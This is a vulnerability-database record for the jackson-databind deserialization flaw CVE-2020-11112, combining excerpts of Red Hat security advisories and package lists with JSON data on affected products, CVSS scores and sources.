undertow: possible Denial Of Service (DOS) in Undertow HTTP server listening on HTTPS (CVE-2019-14888)
-
wildfly: The 'enabled-protocols' value in legacy security is not respected if OpenSSL security provider is in use (CVE-2019-14887)
-
wildfly-core: Incorrect privileges for 'Monitor', 'Auditor' and 'Deployer' user by default (CVE-2019-14838)
-
xml-security: Apache Santuario potentially loads XML parsing code from an untrusted source (CVE-2019-12400)
For more details about the security issues and their impact, the CVSS score, acknowledgements, and other related information, see the CVE pages listed in the References section. You must be logged in to download the update.
NOTE: This advisory is an addendum to https://access.redhat.com/errata/RHBA-2020:1414 and is an informational advisory only, to clarify security fixes released therein. No code has been modified as part of this advisory. Description:
Red Hat Single Sign-On 7.4 is a standalone server, based on the Keycloak project, that provides authentication and standards-based single sign-on capabilities for web and mobile applications. Summary:
This is a security update for JBoss EAP Continuous Delivery 19. JIRA issues fixed (https://issues.jboss.org/):
JBEAP-18881 - Upgrade Undertow to 2.0.30.SP1 JBEAP-18974 - Upgrade snakeyaml to 1.26 JBEAP-18975 - Upgrade cryptacular to 1.2.4 JBEAP-18982 - Upgrade WildFly Core to 11.0.0.Final-redhat-00001 JBEAP-18983 - Upgrade Remoting JMX from 3.0.3 to 3.0.4 JBEAP-19041 - Upgrade WildFly Elytron to 1.11.3.Final JBEAP-19042 - Upgrade wildfly-core to 11.0.2.Final JBEAP-19076 - Upgrade resteasy from 3.11.0.Final to 3.11.1.Final JBEAP-19211 - Empty section Fixed CVEs in CD19 Release Notes
- Description:
Red Hat Process Automation Manager is an open source business process management suite that combines process management and decision service management and enables business and IT users to create, manage, validate, and deploy process applications and decision services. Description:
Red Hat Data Grid is a distributed, in-memory, NoSQL datastore based on the Infinispan project.
This release of Red Hat Data Grid 7.3.7 serves as a replacement for Red Hat Data Grid 7.3.6 and includes bug fixes and enhancements, which are described in the Release Notes, linked to in the References section of this erratum. Solution:
To install this update, do the following:
- Download the Data Grid 7.3.7 server patch from the customer portal. See the download link in the References section. Back up your existing Data Grid installation. You should back up databases, configuration files, and so on. Install the Data Grid 7.3.7 server patch. Refer to the 7.3 Release Notes for patching instructions. Restart Data Grid to ensure the changes take effect. Bugs fixed (https://bugzilla.redhat.com/):
1595621 - CVE-2017-7658 jetty: Incorrect header handling 1715075 - CVE-2019-10172 jackson-mapper-asl: XML external entity similar to CVE-2016-3720 1730462 - CVE-2020-1695 resteasy: Improper validation of response header in MediaTypeHeaderDelegate.java class 1752770 - CVE-2020-1757 undertow: servletPath is normalized incorrectly leading to dangerous application mapping which could result in security bypass 1793970 - CVE-2020-1710 EAP: field-name is not parsed in accordance to RFC7230 1796617 - CVE-2020-1719 Wildfly: EJBContext principal is not popped back after invoking another EJB using a different Security Domain 1807305 - CVE-2020-1745 undertow: AJP File Read/Inclusion Vulnerability 1807707 - CVE-2020-1748 Wildfly: Improper authorization issue in WildFlySecurityManager when using alternative protection domain 1815470 - CVE-2020-10673 jackson-databind: mishandles the interaction between serialization gadgets and typing which could result in remote command execution 1815495 - CVE-2020-10672 jackson-databind: mishandles the interaction between serialization gadgets and typing which could result in remote command execution 1816216 - CVE-2020-11612 netty: compression/decompression codecs don't enforce limits on buffer allocation sizes 1816330 - CVE-2020-8840 jackson-databind: Lacks certain xbean-reflect/JNDI blocking 1816332 - CVE-2020-9546 jackson-databind: Serialization gadgets in shaded-hikari-config 1816337 - CVE-2020-9547 jackson-databind: Serialization gadgets in ibatis-sqlmap 1816340 - CVE-2020-9548 jackson-databind: Serialization gadgets in anteros-core 1819208 - CVE-2020-10968 jackson-databind: Serialization gadgets in org.aoju.bus.proxy.provider.*.RmiProvider 1819212 - CVE-2020-10969 jackson-databind: Serialization gadgets in javax.swing.JEditorPane 1821304 - CVE-2020-11111 jackson-databind: Serialization gadgets in org.apache.activemq.jms.pool.XaPooledConnectionFactory 1821311 - CVE-2020-11112 jackson-databind: Serialization gadgets in org.apache.commons.proxy.provider.remoting.RmiProvider 1821315 - CVE-2020-11113 jackson-databind: Serialization gadgets in org.apache.openjpa.ee.WASRegistryManagedRuntime 1825714 - CVE-2020-10714 wildfly-elytron: session fixation when using FORM authentication 1826798 - CVE-2020-11620 jackson-databind: Serialization gadgets in commons-jelly:commons-jelly 1826805 - CVE-2020-11619 jackson-databind: Serialization gadgets in org.springframework:spring-aop 1831139 - CVE-2020-9488 log4j: improper validation of certificate with host mismatch in SMTP appender
- The purpose of this text-only errata is to inform you about the security issues fixed in this release.
Installation instructions are available from the Fuse 7.7.0 product documentation page: https://access.redhat.com/documentation/en-us/red_hat_fuse/7.7/
- Bugs fixed (https://bugzilla.redhat.com/):
1343616 - CVE-2016-4970 netty: Infinite loop vulnerability when handling renegotiation using SslProvider.OpenSsl 1620529 - CVE-2018-1000632 dom4j: XML Injection in Class: Element. Methods: addElement, addAttribute which can impact the integrity of XML documents 1632452 - CVE-2018-3831 elasticsearch: Information exposure via _cluster/settings API 1637492 - CVE-2018-11797 pdfbox: unbounded computation in parser resulting in a denial of service 1638391 - CVE-2018-12541 vertx: WebSocket HTTP upgrade implementation holds the entire http request in memory before the handshake 1697598 - CVE-2019-3797 spring-data-jpa: Additional information exposure with Spring Data JPA derived queries 1700016 - CVE-2019-0231 mina-core: Retaining an open socket in close_notify SSL-TLS leading to Information disclosure. 1713468 - CVE-2019-12086 jackson-databind: polymorphic typing issue allows attacker to read arbitrary local files on the server. -----BEGIN PGP SIGNED MESSAGE----- Hash: SHA256
===================================================================== Red Hat Security Advisory
Synopsis: Important: rh-maven35-jackson-databind security update Advisory ID: RHSA-2020:1523-01 Product: Red Hat Software Collections Advisory URL: https://access.redhat.com/errata/RHSA-2020:1523 Issue date: 2020-04-21 Cross references: 1822587 1822174 1822932 1822937 1822927 CVE Names: CVE-2020-10968 CVE-2020-10969 CVE-2020-11111 CVE-2020-11112 CVE-2020-11113 =====================================================================
- Summary:
An update for rh-maven35-jackson-databind is now available for Red Hat Software Collections.
Red Hat Product Security has rated this update as having a security impact of Important. A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE link(s) in the References section.
- Relevant releases/architectures:
Red Hat Software Collections for Red Hat Enterprise Linux Server (v. 7) - noarch Red Hat Software Collections for Red Hat Enterprise Linux Server EUS (v. 7.5) - noarch Red Hat Software Collections for Red Hat Enterprise Linux Server EUS (v. 7.6) - noarch Red Hat Software Collections for Red Hat Enterprise Linux Server EUS (v. 7.7) - noarch Red Hat Software Collections for Red Hat Enterprise Linux Workstation (v. 7) - noarch
- Description:
The jackson-databind package provides general data-binding functionality for Jackson, which works on top of Jackson core streaming API.
Security Fix(es):
-
jackson-databind: Serialization gadgets in org.aoju.bus.proxy.provider.*.RmiProvider (CVE-2020-10968)
-
jackson-databind: Serialization gadgets in javax.swing.JEditorPane (CVE-2020-10969)
-
jackson-databind: Serialization gadgets in org.apache.activemq.jms.pool.XaPooledConnectionFactory (CVE-2020-11111)
-
jackson-databind: Serialization gadgets in org.apache.commons.proxy.provider.remoting.RmiProvider (CVE-2020-11112)
-
jackson-databind: Serialization gadgets in org.apache.openjpa.ee.WASRegistryManagedRuntime (CVE-2020-11113)
For more details about the security issue(s), including the impact, a CVSS score, acknowledgments, and other related information, refer to the CVE page(s) listed in the References section.
- Solution:
For details on how to apply this update, which includes the changes described in this advisory, refer to:
https://access.redhat.com/articles/11258
- Bugs fixed (https://bugzilla.redhat.com/):
1819208 - CVE-2020-10968 jackson-databind: Serialization gadgets in org.aoju.bus.proxy.provider.*.RmiProvider 1819212 - CVE-2020-10969 jackson-databind: Serialization gadgets in javax.swing.JEditorPane 1821304 - CVE-2020-11111 jackson-databind: Serialization gadgets in org.apache.activemq.jms.pool.XaPooledConnectionFactory 1821311 - CVE-2020-11112 jackson-databind: Serialization gadgets in org.apache.commons.proxy.provider.remoting.RmiProvider 1821315 - CVE-2020-11113 jackson-databind: Serialization gadgets in org.apache.openjpa.ee.WASRegistryManagedRuntime
- Package List:
Red Hat Software Collections for Red Hat Enterprise Linux Server (v. 7):
Source: rh-maven35-jackson-databind-2.7.6-2.9.el7.src.rpm
noarch: rh-maven35-jackson-databind-2.7.6-2.9.el7.noarch.rpm rh-maven35-jackson-databind-javadoc-2.7.6-2.9.el7.noarch.rpm
Red Hat Software Collections for Red Hat Enterprise Linux Server (v. 7):
Source: rh-maven35-jackson-databind-2.7.6-2.9.el7.src.rpm
noarch: rh-maven35-jackson-databind-2.7.6-2.9.el7.noarch.rpm rh-maven35-jackson-databind-javadoc-2.7.6-2.9.el7.noarch.rpm
Red Hat Software Collections for Red Hat Enterprise Linux Server EUS (v. 7.5):
Source: rh-maven35-jackson-databind-2.7.6-2.9.el7.src.rpm
noarch: rh-maven35-jackson-databind-2.7.6-2.9.el7.noarch.rpm rh-maven35-jackson-databind-javadoc-2.7.6-2.9.el7.noarch.rpm
Red Hat Software Collections for Red Hat Enterprise Linux Server EUS (v. 7.6):
Source: rh-maven35-jackson-databind-2.7.6-2.9.el7.src.rpm
noarch: rh-maven35-jackson-databind-2.7.6-2.9.el7.noarch.rpm rh-maven35-jackson-databind-javadoc-2.7.6-2.9.el7.noarch.rpm
Red Hat Software Collections for Red Hat Enterprise Linux Server EUS (v. 7.7):
Source: rh-maven35-jackson-databind-2.7.6-2.9.el7.src.rpm
noarch: rh-maven35-jackson-databind-2.7.6-2.9.el7.noarch.rpm rh-maven35-jackson-databind-javadoc-2.7.6-2.9.el7.noarch.rpm
Red Hat Software Collections for Red Hat Enterprise Linux Workstation (v. 7):
Source: rh-maven35-jackson-databind-2.7.6-2.9.el7.src.rpm
noarch: rh-maven35-jackson-databind-2.7.6-2.9.el7.noarch.rpm rh-maven35-jackson-databind-javadoc-2.7.6-2.9.el7.noarch.rpm
These packages are GPG signed by Red Hat for security. Our key and details on how to verify the signature are available from https://access.redhat.com/security/team/key/
- References:
https://access.redhat.com/security/cve/CVE-2020-10968 https://access.redhat.com/security/cve/CVE-2020-10969 https://access.redhat.com/security/cve/CVE-2020-11111 https://access.redhat.com/security/cve/CVE-2020-11112 https://access.redhat.com/security/cve/CVE-2020-11113 https://access.redhat.com/security/updates/classification/#important
- Contact:
The Red Hat security contact is secalert@redhat.com. More contact details at https://access.redhat.com/security/team/contact/
Copyright 2020 Red Hat, Inc. -----BEGIN PGP SIGNATURE----- Version: GnuPG v1
iQIVAwUBXp7oOtzjgjWX9erEAQghsBAAk6mN7QOctoM4gV9BDkYybnwjFrgzSgQg LahdpBV7QmHQ/6rdhSlbE8sGCdrUwLJy1GvRS1PzvUY2IzLf8c0rtzcHrIiD1wWB N5kEBWiNgHOpuU4etwbR9gGsY7hhSvyxzTyRhHU36UQJqyNoc95DfbokqeAf8Ggp dfw20J8hsCkQ6OkvDCM6T9fY7jcbHdiD4jx8WSMn3bQS3o8zRf1JJlMPOqLnHM+J 998+RIzoJYqqdL7XNWPMopvR1yps2Xx+NTL4+2Vg8e+2KVxO+ksIu3EqRsCRD0wT 22iPNX3r8ETjWcfLGw0Imvc8RiRsCL7L4oa+cbIpnBdvsRr/yW8IYmvJmHwFTZlK +vIyYPAfSCLuHSktXEwZ9WDMeFsJfZr+zdVZ5MmOgvMAIqg+0RSE3VBlzmuAOMbv yNz6SPODozvMDPmW1OwLhtGsu1CigORIuTRcNSYwTkXVoAxFhWXK0sHuxc3h1ne0 x38Tgk1grF7xbBSfvJwFn0MfBhufg4+iUuFhte7mtuSu3gvjQ/qt01Oo11p8cW2m g6lX1NGEsUpEONf0NS+1hFSxWB4ex7ln98e5AqNWtLHt3S5OHzI67+/4dgl5xF7J PdLv4j8b1AqTV8wRX6pK59OeslYcPhYdMWHEbMSkQJ3WZFOILkyTm6HWer9kl3Yt 8yoMyLl6FBM= =n1if -----END PGP SIGNATURE-----
-- RHSA-announce mailing list RHSA-announce@redhat.com https://www.redhat.com/mailman/listinfo/rhsa-announce
Show details on source website{
"affected_products": {
"_id": null,
"data": [
{
"_id": null,
"model": "communications contacts server",
"scope": "eq",
"trust": 1.0,
"vendor": "oracle",
"version": "8.0.0.4.0"
},
{
"_id": null,
"model": "communications network charging and control",
"scope": "lte",
"trust": 1.0,
"vendor": "oracle",
"version": "12.0.3"
},
{
"_id": null,
"model": "communications session route manager",
"scope": "gte",
"trust": 1.0,
"vendor": "oracle",
"version": "8.2.0"
},
{
"_id": null,
"model": "financial services analytical applications infrastructure",
"scope": "gte",
"trust": 1.0,
"vendor": "oracle",
"version": "8.0.6"
},
{
"_id": null,
"model": "primavera unifier",
"scope": "lte",
"trust": 1.0,
"vendor": "oracle",
"version": "17.12"
},
{
"_id": null,
"model": "primavera unifier",
"scope": "eq",
"trust": 1.0,
"vendor": "oracle",
"version": "16.1"
},
{
"_id": null,
"model": "retail xstore point of service",
"scope": "eq",
"trust": 1.0,
"vendor": "oracle",
"version": "15.0"
},
{
"_id": null,
"model": "financial services analytical applications infrastructure",
"scope": "lte",
"trust": 1.0,
"vendor": "oracle",
"version": "8.1.0"
},
{
"_id": null,
"model": "jd edwards enterpriseone tools",
"scope": "lt",
"trust": 1.0,
"vendor": "oracle",
"version": "9.2.4.2"
},
{
"_id": null,
"model": "communications evolved communications application server",
"scope": "eq",
"trust": 1.0,
"vendor": "oracle",
"version": "7.1"
},
{
"_id": null,
"model": "communications session route manager",
"scope": "lte",
"trust": 1.0,
"vendor": "oracle",
"version": "8.2.2"
},
{
"_id": null,
"model": "retail sales audit",
"scope": "eq",
"trust": 1.0,
"vendor": "oracle",
"version": "14.1"
},
{
"_id": null,
"model": "retail xstore point of service",
"scope": "eq",
"trust": 1.0,
"vendor": "oracle",
"version": "19.0"
},
{
"_id": null,
"model": "retail xstore point of service",
"scope": "eq",
"trust": 1.0,
"vendor": "oracle",
"version": "18.0"
},
{
"_id": null,
"model": "financial services institutional performance analytics",
"scope": "eq",
"trust": 1.0,
"vendor": "oracle",
"version": "8.0.6"
},
{
"_id": null,
"model": "insurance policy administration j2ee",
"scope": "eq",
"trust": 1.0,
"vendor": "oracle",
"version": "11.1.0.15"
},
{
"_id": null,
"model": "banking digital experience",
"scope": "eq",
"trust": 1.0,
"vendor": "oracle",
"version": "18.1"
},
{
"_id": null,
"model": "global lifecycle management opatch",
"scope": "lt",
"trust": 1.0,
"vendor": "oracle",
"version": "12.2.0.1.20"
},
{
"_id": null,
"model": "retail merchandising system",
"scope": "eq",
"trust": 1.0,
"vendor": "oracle",
"version": "15.0"
},
{
"_id": null,
"model": "financial services price creation and discovery",
"scope": "eq",
"trust": 1.0,
"vendor": "oracle",
"version": "8.0.7"
},
{
"_id": null,
"model": "linux",
"scope": "eq",
"trust": 1.0,
"vendor": "debian",
"version": "8.0"
},
{
"_id": null,
"model": "banking platform",
"scope": "lte",
"trust": 1.0,
"vendor": "oracle",
"version": "2.9.0"
},
{
"_id": null,
"model": "banking digital experience",
"scope": "eq",
"trust": 1.0,
"vendor": "oracle",
"version": "20.1"
},
{
"_id": null,
"model": "jackson-databind",
"scope": "lt",
"trust": 1.0,
"vendor": "fasterxml",
"version": "2.9.10.4"
},
{
"_id": null,
"model": "communications session report manager",
"scope": "gte",
"trust": 1.0,
"vendor": "oracle",
"version": "8.2.0"
},
{
"_id": null,
"model": "communications instant messaging server",
"scope": "eq",
"trust": 1.0,
"vendor": "oracle",
"version": "10.0.1.4.0"
},
{
"_id": null,
"model": "banking digital experience",
"scope": "eq",
"trust": 1.0,
"vendor": "oracle",
"version": "18.2"
},
{
"_id": null,
"model": "steelstore cloud integrated storage",
"scope": "eq",
"trust": 1.0,
"vendor": "netapp",
"version": null
},
{
"_id": null,
"model": "communications session report manager",
"scope": "lte",
"trust": 1.0,
"vendor": "oracle",
"version": "8.2.2"
},
{
"_id": null,
"model": "jd edwards enterpriseone orchestrator",
"scope": "lt",
"trust": 1.0,
"vendor": "oracle",
"version": "9.2.4.2"
},
{
"_id": null,
"model": "primavera unifier",
"scope": "eq",
"trust": 1.0,
"vendor": "oracle",
"version": "16.2"
},
{
"_id": null,
"model": "primavera unifier",
"scope": "eq",
"trust": 1.0,
"vendor": "oracle",
"version": "18.8"
},
{
"_id": null,
"model": "retail service backbone",
"scope": "eq",
"trust": 1.0,
"vendor": "oracle",
"version": "15.0"
},
{
"_id": null,
"model": "retail xstore point of service",
"scope": "eq",
"trust": 1.0,
"vendor": "oracle",
"version": "16.0"
},
{
"_id": null,
"model": "enterprise manager base platform",
"scope": "eq",
"trust": 1.0,
"vendor": "oracle",
"version": "13.4.0.0"
},
{
"_id": null,
"model": "communications element manager",
"scope": "gte",
"trust": 1.0,
"vendor": "oracle",
"version": "8.2.0"
},
{
"_id": null,
"model": "financial services institutional performance analytics",
"scope": "eq",
"trust": 1.0,
"vendor": "oracle",
"version": "8.1.0"
},
{
"_id": null,
"model": "communications element manager",
"scope": "lte",
"trust": 1.0,
"vendor": "oracle",
"version": "8.2.2"
},
{
"_id": null,
"model": "insurance policy administration j2ee",
"scope": "eq",
"trust": 1.0,
"vendor": "oracle",
"version": "11.0.2.25"
},
{
"_id": null,
"model": "agile plm",
"scope": "eq",
"trust": 1.0,
"vendor": "oracle",
"version": "9.3.6"
},
{
"_id": null,
"model": "banking digital experience",
"scope": "eq",
"trust": 1.0,
"vendor": "oracle",
"version": "19.2"
},
{
"_id": null,
"model": "communications contacts server",
"scope": "eq",
"trust": 1.0,
"vendor": "oracle",
"version": "8.0.0.5.0"
},
{
"_id": null,
"model": "primavera unifier",
"scope": "gte",
"trust": 1.0,
"vendor": "oracle",
"version": "17.7"
},
{
"_id": null,
"model": "autovue for agile product lifecycle management",
"scope": "eq",
"trust": 1.0,
"vendor": "oracle",
"version": "21.0.2"
},
{
"_id": null,
"model": "weblogic server",
"scope": "eq",
"trust": 1.0,
"vendor": "oracle",
"version": "12.2.1.3.0"
},
{
"_id": null,
"model": "primavera unifier",
"scope": "eq",
"trust": 1.0,
"vendor": "oracle",
"version": "19.12"
},
{
"_id": null,
"model": "retail xstore point of service",
"scope": "eq",
"trust": 1.0,
"vendor": "oracle",
"version": "17.0"
},
{
"_id": null,
"model": "weblogic server",
"scope": "eq",
"trust": 1.0,
"vendor": "oracle",
"version": "12.2.1.4.0"
},
{
"_id": null,
"model": "financial services price creation and discovery",
"scope": "eq",
"trust": 1.0,
"vendor": "oracle",
"version": "8.0.6"
},
{
"_id": null,
"model": "banking digital experience",
"scope": "eq",
"trust": 1.0,
"vendor": "oracle",
"version": "19.1"
},
{
"_id": null,
"model": "communications network charging and control",
"scope": "eq",
"trust": 1.0,
"vendor": "oracle",
"version": "6.0.1"
},
{
"_id": null,
"model": "retail service backbone",
"scope": "eq",
"trust": 1.0,
"vendor": "oracle",
"version": "14.1"
},
{
"_id": null,
"model": "communications diameter signaling router",
"scope": "lte",
"trust": 1.0,
"vendor": "oracle",
"version": "8.2.2"
},
{
"_id": null,
"model": "enterprise manager base platform",
"scope": "eq",
"trust": 1.0,
"vendor": "oracle",
"version": "13.3.0.0"
},
{
"_id": null,
"model": "retail service backbone",
"scope": "eq",
"trust": 1.0,
"vendor": "oracle",
"version": "16.0"
},
{
"_id": null,
"model": "financial services retail customer analytics",
"scope": "eq",
"trust": 1.0,
"vendor": "oracle",
"version": "8.0.6"
},
{
"_id": null,
"model": "financial services institutional performance analytics",
"scope": "eq",
"trust": 1.0,
"vendor": "oracle",
"version": "8.0.7"
},
{
"_id": null,
"model": "communications diameter signaling router",
"scope": "gte",
"trust": 1.0,
"vendor": "oracle",
"version": "8.0.0"
},
{
"_id": null,
"model": "jackson-databind",
"scope": "gte",
"trust": 1.0,
"vendor": "fasterxml",
"version": "2.9.0"
},
{
"_id": null,
"model": "communications calendar server",
"scope": "eq",
"trust": 1.0,
"vendor": "oracle",
"version": "8.0.0.4.0"
},
{
"_id": null,
"model": "banking platform",
"scope": "gte",
"trust": 1.0,
"vendor": "oracle",
"version": "2.4.0"
},
{
"_id": null,
"model": "banking digital experience",
"scope": "eq",
"trust": 1.0,
"vendor": "oracle",
"version": "18.3"
},
{
"_id": null,
"model": "communications network charging and control",
"scope": "gte",
"trust": 1.0,
"vendor": "oracle",
"version": "12.0.0"
},
{
"_id": null,
"model": "jackson-databind",
"scope": "eq",
"trust": 0.8,
"vendor": "fasterxml",
"version": "2.9.10.4"
}
],
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2020-003616"
},
{
"db": "NVD",
"id": "CVE-2020-11112"
}
]
},
"configurations": {
"_id": null,
"data": [
{
"CVE_data_version": "4.0",
"nodes": [
{
"cpe_match": [
{
"cpe22Uri": "cpe:/a:fasterxml:jackson-databind",
"vulnerable": true
}
],
"operator": "OR"
}
]
}
],
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2020-003616"
}
]
},
"credits": {
"_id": null,
"data": "Red Hat",
"sources": [
{
"db": "PACKETSTORM",
"id": "157741"
},
{
"db": "PACKETSTORM",
"id": "160601"
},
{
"db": "PACKETSTORM",
"id": "157859"
},
{
"db": "PACKETSTORM",
"id": "158651"
},
{
"db": "PACKETSTORM",
"id": "159208"
},
{
"db": "PACKETSTORM",
"id": "158636"
},
{
"db": "PACKETSTORM",
"id": "157322"
},
{
"db": "CNNVD",
"id": "CNNVD-202003-1736"
}
],
"trust": 1.3
},
"cve": "CVE-2020-11112",
"cvss": {
"_id": null,
"data": [
{
"cvssV2": [
{
"accessComplexity": "MEDIUM",
"accessVector": "NETWORK",
"authentication": "NONE",
"author": "nvd@nist.gov",
"availabilityImpact": "PARTIAL",
"baseScore": 6.8,
"confidentialityImpact": "PARTIAL",
"exploitabilityScore": 8.6,
"id": "CVE-2020-11112",
"impactScore": 6.4,
"integrityImpact": "PARTIAL",
"severity": "MEDIUM",
"trust": 1.1,
"vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P",
"version": "2.0"
},
{
"acInsufInfo": null,
"accessComplexity": "Medium",
"accessVector": "Network",
"authentication": "None",
"author": "NVD",
"availabilityImpact": "Partial",
"baseScore": 6.8,
"confidentialityImpact": "Partial",
"exploitabilityScore": null,
"id": "JVNDB-2020-003616",
"impactScore": null,
"integrityImpact": "Partial",
"obtainAllPrivilege": null,
"obtainOtherPrivilege": null,
"obtainUserPrivilege": null,
"severity": "Medium",
"trust": 0.8,
"userInteractionRequired": null,
"vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P",
"version": "2.0"
},
{
"accessComplexity": "MEDIUM",
"accessVector": "NETWORK",
"authentication": "NONE",
"author": "VULHUB",
"availabilityImpact": "PARTIAL",
"baseScore": 6.8,
"confidentialityImpact": "PARTIAL",
"exploitabilityScore": 8.6,
"id": "VHN-163658",
"impactScore": 6.4,
"integrityImpact": "PARTIAL",
"severity": "MEDIUM",
"trust": 0.1,
"vectorString": "AV:N/AC:M/AU:N/C:P/I:P/A:P",
"version": "2.0"
}
],
"cvssV3": [
{
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"author": "nvd@nist.gov",
"availabilityImpact": "HIGH",
"baseScore": 8.8,
"baseSeverity": "HIGH",
"confidentialityImpact": "HIGH",
"exploitabilityScore": 2.8,
"id": "CVE-2020-11112",
"impactScore": 5.9,
"integrityImpact": "HIGH",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"trust": 2.0,
"userInteraction": "REQUIRED",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
"version": "3.1"
},
{
"attackComplexity": "Low",
"attackVector": "Network",
"author": "NVD",
"availabilityImpact": "High",
"baseScore": 8.8,
"baseSeverity": "High",
"confidentialityImpact": "High",
"exploitabilityScore": null,
"id": "JVNDB-2020-003616",
"impactScore": null,
"integrityImpact": "High",
"privilegesRequired": "None",
"scope": "Unchanged",
"trust": 0.8,
"userInteraction": "Required",
"vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
"version": "3.0"
}
],
"severity": [
{
"author": "nvd@nist.gov",
"id": "CVE-2020-11112",
"trust": 1.0,
"value": "HIGH"
},
{
"author": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
"id": "CVE-2020-11112",
"trust": 1.0,
"value": "HIGH"
},
{
"author": "NVD",
"id": "JVNDB-2020-003616",
"trust": 0.8,
"value": "High"
},
{
"author": "CNNVD",
"id": "CNNVD-202003-1736",
"trust": 0.6,
"value": "HIGH"
},
{
"author": "VULHUB",
"id": "VHN-163658",
"trust": 0.1,
"value": "MEDIUM"
},
{
"author": "VULMON",
"id": "CVE-2020-11112",
"trust": 0.1,
"value": "MEDIUM"
}
]
}
],
"sources": [
{
"db": "VULHUB",
"id": "VHN-163658"
},
{
"db": "VULMON",
"id": "CVE-2020-11112"
},
{
"db": "CNNVD",
"id": "CNNVD-202003-1736"
},
{
"db": "JVNDB",
"id": "JVNDB-2020-003616"
},
{
"db": "NVD",
"id": "CVE-2020-11112"
},
{
"db": "NVD",
"id": "CVE-2020-11112"
}
]
},
"description": {
"_id": null,
"data": "FasterXML jackson-databind 2.x before 2.9.10.4 mishandles the interaction between serialization gadgets and typing, related to org.apache.commons.proxy.provider.remoting.RmiProvider (aka apache/commons-proxy). FasterXML jackson-databind Exists in an unreliable data deserialization vulnerability.Information is obtained, information is tampered with, and service operation is interrupted. (DoS) It may be put into a state. FasterXML Jackson is a data processing tool for Java developed by American FasterXML Company. jackson-databind is one of the components with data binding function. A security vulnerability exists in FasterXML jackson-databind 2.x versions prior to 2.9.10.4. Currently there is no information about this vulnerability, please keep an eye on CNNVD or vendor announcements. \n\nSecurity Fix(es):\n\n* apache-commons-beanutils: does not suppresses the class property in\nPropertyUtilsBean by default (CVE-2019-10086)\n\n* cxf: does not restrict the number of message attachments (CVE-2019-12406)\n\n* cxf: OpenId Connect token service does not properly validate the clientId\n(CVE-2019-12419)\n\n* hibernate-validator: safeHTML validator allows XSS (CVE-2019-10219)\n\n* HTTP/2: flood using PING frames results in unbounded memory growth\n(CVE-2019-9512)\n\n* HTTP/2: flood using HEADERS frames results in unbounded memory growth\n(CVE-2019-9514)\n\n* HTTP/2: flood using SETTINGS frames results in unbounded memory growth\n(CVE-2019-9515)\n\n* HTTP/2: large amount of data requests leads to denial of service\n(CVE-2019-9511)\n\n* jackson-databind: Multiple serialization gadgets (CVE-2019-17531,\nCVE-2019-16943, CVE-2019-16942, CVE-2019-17267, CVE-2019-14540,\nCVE-2019-16335, CVE-2019-14893, CVE-2019-14892, CVE-2020-9546,\nCVE-2020-9547, CVE-2020-9548, CVE-2020-10969, CVE-2020-10968,\nCVE-2020-11111, CVE-2020-11112, CVE-2020-11113, CVE-2020-11619,\nCVE-2020-11620, CVE-2019-20330, CVE-2020-8840)\n\n* jackson-databind: mishandles the interaction between serialization\ngadgets and typing which could result in remote command \nexecution (CVE-2020-10672, CVE-2020-10673)\n\n* keycloak: adapter endpoints are exposed via arbitrary URLs\n(CVE-2019-14820)\n\n* keycloak: missing signatures validation on CRL used to verify client\ncertificates (CVE-2019-3875)\n\n* keycloak: SAML broker does not check existence of signature on document\nallowing any user impersonation (CVE-2019-10201)\n\n* keycloak: CSRF check missing in My Resources functionality in the Account\nConsole (CVE-2019-10199)\n\n* keycloak: cross-realm user access auth bypass (CVE-2019-14832)\n\n* netty: HTTP Request Smuggling due to Transfer-Encoding whitespace\nmishandling (CVE-2020-7238)\n\n* SmallRye: SecuritySupport class is incorrectly public and contains a\nstatic method to access the current threads context class loader\n(CVE-2020-1729)\n\n* thrift: Out-of-bounds read related to TJSONProtocol or\nTSimpleJSONProtocol (CVE-2019-0210)\n\n* thrift: Endless loop when feed with specific input data (CVE-2019-0205)\n\n* undertow: possible Denial Of Service (DOS) in Undertow HTTP server\nlistening on HTTPS (CVE-2019-14888)\n\n* wildfly: The \u0027enabled-protocols\u0027 value in legacy security is not\nrespected if OpenSSL security provider is in use (CVE-2019-14887)\n\n* wildfly-core: Incorrect privileges for \u0027Monitor\u0027, \u0027Auditor\u0027 and\n\u0027Deployer\u0027 user by default (CVE-2019-14838)\n\n* xml-security: Apache Santuario potentially loads XML parsing code from an\nuntrusted source (CVE-2019-12400)\n\nFor more details about the security issues and their impact, the CVSS\nscore, acknowledgements, and other related information, see the CVE pages\nlisted in the References section. You must be logged in to download the update. \n\nNOTE: This advisory is an addendum to\nhttps://access.redhat.com/errata/RHBA-2020:1414 and is an informational\nadvisory only, to clarify security fixes released therein. No code has been\nmodified as part of this advisory. Description:\n\nRed Hat Single Sign-On 7.4 is a standalone server, based on the Keycloak\nproject, that provides authentication and standards-based single sign-on\ncapabilities for web and mobile applications. Summary:\n\nThis is a security update for JBoss EAP Continuous Delivery 19. JIRA issues fixed (https://issues.jboss.org/):\n\nJBEAP-18881 - Upgrade Undertow to 2.0.30.SP1\nJBEAP-18974 - Upgrade snakeyaml to 1.26\nJBEAP-18975 - Upgrade cryptacular to 1.2.4\nJBEAP-18982 - Upgrade WildFly Core to 11.0.0.Final-redhat-00001\nJBEAP-18983 - Upgrade Remoting JMX from 3.0.3 to 3.0.4\nJBEAP-19041 - Upgrade WildFly Elytron to 1.11.3.Final\nJBEAP-19042 - Upgrade wildfly-core to 11.0.2.Final\nJBEAP-19076 - Upgrade resteasy from 3.11.0.Final to 3.11.1.Final\nJBEAP-19211 - Empty section Fixed CVEs in CD19 Release Notes\n\n6. Description:\n\nRed Hat Process Automation Manager is an open source business process\nmanagement suite that combines process management and decision service\nmanagement and enables business and IT users to create, manage, validate,\nand deploy process applications and decision services. Description:\n\nRed Hat Data Grid is a distributed, in-memory, NoSQL datastore based on the\nInfinispan project. \n\nThis release of Red Hat Data Grid 7.3.7 serves as a replacement for Red Hat\nData Grid 7.3.6 and includes bug fixes and enhancements, which are\ndescribed in the Release Notes, linked to in the References section of this\nerratum. Solution:\n\nTo install this update, do the following:\n\n1. Download the Data Grid 7.3.7 server 